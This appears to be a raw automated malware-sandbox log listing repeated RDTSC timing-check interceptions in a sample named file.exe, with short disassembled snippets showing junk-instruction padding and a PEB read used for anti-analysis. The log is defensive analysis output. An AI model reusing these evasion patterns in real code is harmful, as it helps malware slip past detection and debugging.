Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFAAD3 second address: DFAAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFAAD7 second address: DFAADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFAADB second address: DFAAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFAAE1 second address: DFAAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFB60A second address: DFB60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFB60E second address: DFB637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F70F070E5D3h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d jnp 00007F70F070E5D2h 0x00000013 jne 00007F70F070E5C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFB637 second address: DFB643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F70F0BCDB0Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0060E second address: E00614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E00614 second address: E00618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FC23 second address: E0FC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F70F070E5C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FC2E second address: E0FC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F0BCDB11h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F0BCDB0Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FC54 second address: E0FC5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0DE38 second address: E0DE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0DE3C second address: E0DE46 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0DE46 second address: E0DE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0DE4C second address: E0DE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0DE54 second address: E0DE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0DE58 second address: E0DE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0E27F second address: E0E283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0E283 second address: E0E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0E819 second address: E0E81F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0E81F second address: E0E82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FAA5 second address: E0FAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FAAB second address: E0FAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FAB1 second address: E0FABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F70F0BCDB0Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1547B second address: E15481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E15481 second address: E1549F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007F70F0BCDB19h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1549F second address: E154A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E154A4 second address: E154B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E154B0 second address: E154E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F70F070E5D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F70F070E5D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1577E second address: E15785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E23273 second address: E2328D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F70F070E5D0h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2328D second address: E23297 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E23297 second address: E2329D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2329D second address: E232AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E232AE second address: E232C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4421A second address: E44220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44220 second address: E44226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E42AF0 second address: E42AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E42DD9 second address: E42DE7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E430B0 second address: E430B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E43F7F second address: E43F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E43F88 second address: E43F92 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E43F92 second address: E43FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E490FF second address: E49103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A61A second address: E8A62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F70F070E5C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A62B second address: E8A635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A635 second address: E8A63F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A63F second address: E8A65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F70F0BCDB06h 0x0000000a jmp 00007F70F0BCDB16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A65F second address: E8A663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A663 second address: E8A69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F70F0BCDB0Ah 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jnp 00007F70F0BCDB1Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86E01 second address: E86E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86E09 second address: E86E22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F70F0BCDB10h 0x0000000a pop ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86E22 second address: E86E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F70F070E5D2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86E33 second address: E86E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86E39 second address: E86E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F070E5C8h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86E45 second address: E86E4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E981D7 second address: E981F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F70F070E5C6h 0x0000000a jmp 00007F70F070E5CAh 0x0000000f popad 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jno 00007F70F070E5C6h 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E981F9 second address: E98208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98208 second address: E98210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98210 second address: E9821B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F70F0BCDB06h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9821B second address: E98223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98223 second address: E98227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98227 second address: E9822B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9822B second address: E98235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98235 second address: E98239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A914 second address: E9A918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60F3C second address: F60F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F602A3 second address: F602DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d jg 00007F70F0BCDB0Ch 0x00000013 pushad 0x00000014 jne 00007F70F0BCDB06h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60B27 second address: F60B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60B2B second address: F60B53 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F0BCDB0Ah 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F70F0BCDB0Fh 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6383B second address: F63844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63844 second address: F63848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63AAD second address: F63AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63B76 second address: F63BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F70F0BCDB0Bh 0x00000011 call 00007F70F0BCDB16h 0x00000016 mov dword ptr [ebp+122D1C42h], ecx 0x0000001c pop edx 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F70F0BCDB08h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 sub dword ptr [ebp+12478A83h], ecx 0x0000003f call 00007F70F0BCDB09h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jbe 00007F70F0BCDB06h 0x0000004d jo 00007F70F0BCDB06h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63BF4 second address: F63C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70F070E5D0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jnp 00007F70F070E5C6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63C17 second address: F63C3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB08h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 jnc 00007F70F0BCDB0Ch 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63C3D second address: F63C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E05 second address: F68E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E0B second address: F68E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E0F second address: F68E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E17 second address: F68E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E2D second address: F68E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260044 second address: 726004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726004A second address: 7260050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260050 second address: 72600C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007F70F070E5D0h 0x00000016 sub esp, 18h 0x00000019 jmp 00007F70F070E5D0h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F70F070E5D0h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov bx, AB84h 0x0000002a pushad 0x0000002b mov edi, 3AADCBEEh 0x00000030 mov al, dh 0x00000032 popad 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F70F070E5CDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600C6 second address: 72600CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600CC second address: 72600D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600D0 second address: 72600D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600D4 second address: 72600E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600E5 second address: 72600EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600EB second address: 726012A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F70F070E5CBh 0x00000013 jmp 00007F70F070E5D3h 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726012A second address: 7260130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260130 second address: 7260134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260134 second address: 7260155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260155 second address: 7260238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F70F070E5D4h 0x00000011 jmp 00007F70F070E5D5h 0x00000016 popfd 0x00000017 popad 0x00000018 mov esi, dword ptr [759B06ECh] 0x0000001e jmp 00007F70F070E5CDh 0x00000023 test esi, esi 0x00000025 jmp 00007F70F070E5CEh 0x0000002a jne 00007F70F070F423h 0x00000030 pushad 0x00000031 jmp 00007F70F070E5CEh 0x00000036 mov edx, ecx 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov ecx, 408172F9h 0x00000040 call 00007F70F070E5D6h 0x00000045 jmp 00007F70F070E5D2h 0x0000004a pop eax 0x0000004b popad 0x0000004c push eax 0x0000004d pushad 0x0000004e mov edi, eax 0x00000050 pushfd 0x00000051 jmp 00007F70F070E5CAh 0x00000056 and eax, 199ACE68h 0x0000005c jmp 00007F70F070E5CBh 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F70F070E5D5h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260238 second address: 726023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
